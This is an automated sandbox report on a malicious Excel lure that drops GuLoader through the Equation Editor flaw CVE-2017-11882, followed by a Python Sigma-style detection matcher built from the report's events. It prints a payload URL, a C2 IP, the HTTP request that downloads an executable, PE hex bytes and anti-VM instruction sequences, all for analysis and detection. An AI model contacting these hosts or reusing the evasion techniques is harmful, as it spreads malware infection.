Windows Analysis Report MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Overview

General Information

Sample Name: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
Analysis ID: 452495
MD5: b7cdda847140697b7bb7866b06d2a225
SHA1: 874d1157c6e65813383c6b4bffd4d48948993c88
SHA256: 1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2368 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2124 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2192 cmdline: 'C:\Users\Public\vbc.exe' MD5: C937FC9ED4325E6AB24D49A3175F3A5C)

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}

Yara Overview

Memory Dumps

Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: (none listed)

    Sigma Overview

    Exploits:

    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network Connection; Author: Joe Security; Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

    System Summary:

    Sigma detected: Droppers Exploiting CVE-2017-11882
    Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2192
    Sigma detected: Execution from Suspicious Folder
    Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2192

    Jbx Signature Overview


    AV Detection:

    Antivirus detection for URL or domain
    Source: http://180.214.239.39/process/.svchost.exe; Avira URL Cloud: Label: malware
    Found malware configuration
    Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp; Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe; ReversingLabs: Detection: 42%
    Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 42%

    Exploits:

    Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe (listed twice in the report)
    Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb; source: .svchost[1].exe.4.dr
    Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80 (listed twice in the report)

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor; URLs: https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 11:50:59 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 21 Jul 2021 22:37:17 GMTETag: "3c468-5c7a9d0090119"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox View; IP Address: 180.214.239.39
    Source: Joe Sandbox View; ASN Name: VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP VN
    Source: global traffic; HTTP traffic detected:
        GET /process/.svchost.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 180.214.239.39
        Connection: Keep-Alive
    Source: unknown; TCP traffic detected without corresponding DNS query: 180.214.239.39 (50 occurrences in the report)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf
    Source: global traffic; HTTP traffic detected: GET /process/.svchost.exe HTTP/1.1 (the same request, headers and User-Agent as above, listed a second time in the report)
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://ocsp.digicert.com0C
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://ocsp.digicert.com0O
    Source: F70A7842.emf.0.dr; String found in binary or memory: http://www.day.com/dam/1.0
    Source: .svchost[1].exe.4.dr; String found in binary or memory: http://www.digicert.com/CPS0
    Source: .svchost[1].exe.4.dr; String found in binary or memory: https://www.digicert.com/CPS0
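    The Sigma hits in the overview (the EQNEDT32.EXE network connection, the file drop, and the two process-creation rules) and the HTTP transaction in this section are, at bottom, field comparisons over process, file and network events. The following is an added example written for this page, not Joe Sandbox's or the Sigma project's own code: a minimal Sigma-style matcher run over events constructed from the field values the report shows. Assumptions: the rule bodies are simplified approximations of the published rules (the real "Execution from Suspicious Folder" rule covers more folders than the two used here); the fifth rule, for a PE download from a bare-IP host, is written here and has no published counterpart; Sysmon EventID 1 is used for the process-creation events whose EventID the report does not print; and the EXCEL.EXE control event carries no parent because the report lists its parent as unknown.

```python
import re

EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed events. Field values are copied from this report's Sigma hits and
# HTTP capture (Sysmon-style EventIDs: 1 process create, 3 network, 11 file create;
# EventID 1 for the process events is an assumption, the report does not print it).
# The EXCEL.EXE entry is a benign control whose parent the report lists as unknown.
EVENTS = [
    {"EventID": 1, "ProcessId": 2192, "Image": r"C:\Users\Public\vbc.exe",
     "CommandLine": r"'C:\Users\Public\vbc.exe'", "ParentProcessId": 2124,
     "ParentImage": EQNEDT, "ParentCommandLine": "'" + EQNEDT + "' -Embedding"},
    {"EventID": 3, "ProcessId": 2124, "Image": EQNEDT, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.22", "SourcePort": 49167,
     "DestinationIp": "180.214.239.39", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2124, "Image": EQNEDT,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
                       r"\Content.IE5\ZAE7RW1P\.svchost[1].exe"},
    {"EventID": 1, "ProcessId": 2368, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    # HTTP transaction assembled from the GET request and the 200 OK response in this section.
    {"Method": "GET", "Uri": "/process/.svchost.exe", "Host": "180.214.239.39",
     "UserAgent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
                  ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
                  ".NET4.0C; .NET4.0E)",
     "ContentType": "application/x-msdownload", "ContentLength": 246888, "BodyHex": "4d5a9000"},
]

# Simplified Sigma-style rules: every key in "detection" must match (AND); a list
# value means any element may match (OR); "field|modifier" selects the comparison.
# Approximations written for this page, not the published Sigma YAML.
RULES = [
    {"title": "Droppers Exploiting CVE-2017-11882",
     "detection": {"EventID": 1, "ParentImage|endswith": r"\EQNEDT32.EXE"}},
    {"title": "Execution from Suspicious Folder",          # the real rule lists more folders
     "detection": {"EventID": 1, "Image|contains": ["\\Users\\Public\\", "\\Windows\\Temp\\"]}},
    {"title": "EQNEDT32.EXE connecting to internet",
     "detection": {"EventID": 3, "Image|endswith": r"\EQNEDT32.EXE", "Initiated": True}},
    {"title": "File Dropped By EQNEDT32EXE",
     "detection": {"EventID": 11, "Image|endswith": r"\EQNEDT32.EXE"}},
    {"title": "PE download from bare-IP host",               # written here, no published rule
     "detection": {"Host|re": r"^\d{1,3}(\.\d{1,3}){3}$",
                   "ContentType": "application/x-msdownload", "BodyHex|startswith": "4d5a"}},
]


def value_matches(actual, modifier, expected):
    """Compare one event field against a rule value; strings compare case-insensitively as in Sigma."""
    for exp in expected if isinstance(expected, list) else [expected]:
        if modifier == "re":
            if isinstance(actual, str) and re.search(exp, actual):
                return True
        elif modifier is None:
            if isinstance(actual, str) and isinstance(exp, str):
                if actual.lower() == exp.lower():
                    return True
            elif actual == exp:
                return True
        else:
            a, e = str(actual).lower(), str(exp).lower()
            if {"endswith": a.endswith(e), "startswith": a.startswith(e), "contains": e in a}[modifier]:
                return True
    return False


def rule_matches(rule, event):
    """All selection keys must hold; a field absent from the event never matches."""
    for key, expected in rule["detection"].items():
        field, _, modifier = key.partition("|")
        if field not in event or not value_matches(event[field], modifier or None, expected):
            return False
    return True


def run_rules(rules, events):
    """Map each rule title to the ProcessIds (or the Host, for HTTP events) it fired on."""
    hits = {rule["title"]: [] for rule in rules}
    for event in events:
        for rule in rules:
            if rule_matches(rule, event):
                hits[rule["title"]].append(event.get("ProcessId", event.get("Host")))
    return hits


if __name__ == "__main__":
    for title, matched in run_rules(RULES, EVENTS).items():
        print(f"{title}: {matched or 'no hits'}")
```

    Running it prints one line per rule: the four EQNEDT32-related rules fire on PIDs 2192 and 2124 exactly as the report's Sigma section shows, the EXCEL.EXE control matches nothing, and the bare-IP rule is the HTTP-layer equivalent of the "TCP traffic detected without corresponding DNS query" observation when only proxy-style metadata is available.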

    System Summary:

    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    Source: C:\Users\Public\vbc.exe; Process Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
    Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_002E543B NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_002E5540 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exe; Code functions (62 listed):
        6_2_002E543B, 6_2_002E2C2A, 6_2_002E8C36, 6_2_002E841E, 6_2_002E4860, 6_2_002E7077, 6_2_002E0C4C, 6_2_002E8C42,
        6_2_002E0C54, 6_2_002E2455, 6_2_002E80A4, 6_2_002E28A0, 6_2_002E048D, 6_2_002E0889, 6_2_002E80EF, 6_2_002E48E9,
        6_2_002E80C6, 6_2_002E0CC3, 6_2_002E38D1, 6_2_002E3D2C, 6_2_002E7D3E, 6_2_002E5908, 6_2_002E7D06, 6_2_002E4105,
        6_2_002E2518, 6_2_002E0916, 6_2_002E4912, 6_2_002E517E, 6_2_002E0147, 6_2_002E5D43, 6_2_002E15BD, 6_2_002E05B1,
        6_2_002E3D84, 6_2_002E322C, 6_2_002E2228, 6_2_002E1A21, 6_2_002E163B, 6_2_002E421B, 6_2_002E3A18, 6_2_002E3A69,
        6_2_002E1A78, 6_2_002E3259, 6_2_002E3684, 6_2_002E42C0, 6_2_002E3ED8, 6_2_002E832E, 6_2_002E3325, 6_2_002E6B35,
        6_2_002E770F, 6_2_002E4712, 6_2_002E6B7B, 6_2_002E2379, 6_2_002E7F4E, 6_2_002E475F, 6_2_002E6FAF, 6_2_002E27A4,
        6_2_002E7BA4, 6_2_002E47A2, 6_2_002E87BC, 6_2_002E23FF, 6_2_002E47C8, 6_2_002E0BDC
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: .svchost[1].exe.4.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 such resources)
    Source: vbc.exe.4.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 such resources)
    Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVR164D.tmp
    Source: C:\Users\Public\vbc.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File read: C:\Windows\System32\drivers\etc\hosts (listed twice in the report)
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' (listed twice in the report)
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx; Static file information: File size 1267200 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb; source: .svchost[1].exe.4.dr
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx; Initial sample: OLE indicators vbamacros = False
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx; Initial sample: OLE indicators encrypted = True

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match; File source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exe; Code function: push edx; ret (31 sites):
        6_2_002212F5, 6_2_00221023, 6_2_00222823, 6_2_00224023, 6_2_00227024, 6_2_00225825, 6_2_00224833, 6_2_00223033,
        6_2_00221833, 6_2_00226034, 6_2_00220038, 6_2_00224803, 6_2_00223003, 6_2_00221803, 6_2_00226004, 6_2_00220008,
        6_2_00223813, 6_2_00225013, 6_2_00222014, 6_2_00226814, 6_2_00220818, 6_2_00223063, 6_2_00221863, 6_2_00224863,
        6_2_00226065, 6_2_00220068, 6_2_00222074, 6_2_00223874, 6_2_00225074, 6_2_00226875, 6_2_00220878
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe (listed twice in the report)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (9 occurrences)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX (8 occurrences)
    Source: C:\Users\Public\vbc.exe; Process information set: NOOPENFILEERRORBOX (5 occurrences)
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx; Stream path 'EncryptedPackage' entropy: 7.99876914636 (max. 8.0)

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E28A0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D3E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7503
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2379
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E27A4
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002E750B second address: 00000000002E752A instructions:
        0x00000000 rdtsc
        0x00000002 mov eax, 4E5E24E1h
        0x00000007 xor eax, 256A0EB4h
        0x0000000c xor eax, 6B41C15Ch
        0x00000011 xor eax, 0075EB08h
        0x00000016 cpuid
        0x00000018 popad
        0x00000019 pushad
        0x0000001a mov ecx, 000000F8h
        0x0000001f rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E542E rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E542E rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E504C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D3E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7106 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E322C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3259 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2EF7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E6B69 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E27A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7337 cpuid
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Exploitation for Client Execution12 | Path Interception | Process Injection12 | Masquerading111 | OS Credential Dumping | Security Software Discovery41 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
